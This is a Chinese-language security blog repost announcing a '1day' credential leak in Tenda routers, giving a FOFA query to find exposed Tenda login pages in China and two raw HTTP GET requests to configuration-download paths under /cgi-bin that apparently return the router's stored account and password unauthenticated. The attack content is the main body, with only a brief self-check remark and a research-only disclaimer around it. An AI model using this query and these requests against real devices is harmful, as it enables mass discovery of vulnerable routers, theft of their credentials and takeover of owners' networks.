【1day】Tenda账号密码泄露之2个POC

admin 2023年12月14日12:11:45评论67 views字数 1318阅读4分23秒阅读模式
    师傅们,HW结束后,最近发先有好多day流出,慢慢的正在促进整个网络安全环境的改变,让网络安全成为生活中随处可见的一种科学技术,也让更多的人们认识到信息安全真的就在身边。
    废话不多说,上day,师傅们自查,如果有使用到该产品记得及时联系厂商修复以及做好相关防护策略。
一.资产
fofa:title="Tenda | LOGIN" && country="CN"
【1day】Tenda账号密码泄露之2个POC
二.直接上POC
POC1
GET /cgi-bin/DownloadCfg.jpg HTTP/1.1Host: ip:portCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
POC2
GET /cgi-bin/DownloadCfg/RouterCfm.jpg HTTP/1.1Host: ip:portCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
三.复现过程
POC1

【1day】Tenda账号密码泄露之2个POC

POC2

【1day】Tenda账号密码泄露之2个POC

四.总结
    继续为我国网络安全事业奋斗!

免责声明:

  本文章仅做网络安全技术研究使用!另利用网络安全007公众号所提供的所有信息进行违法犯罪或造成任何后果及损失,均由使用者自身承担负责,与网络安全007公众号无任何关系,也不为其负任何责任,请各位自重!公众号发表的一切文章如有侵权烦请私信联系告知,我们会立即删除并对您表达最诚挚的歉意!感谢您的理解!让我们一起为我国网络安全事业尽一份自己的绵薄之力!


原文始发于微信公众号(网络安全007):【1day】Tenda账号密码泄露之2个POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月14日12:11:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【1day】Tenda账号密码泄露之2个POChttp://cn-sec.com/archives/2295954.html

发表评论

匿名网友 填写信息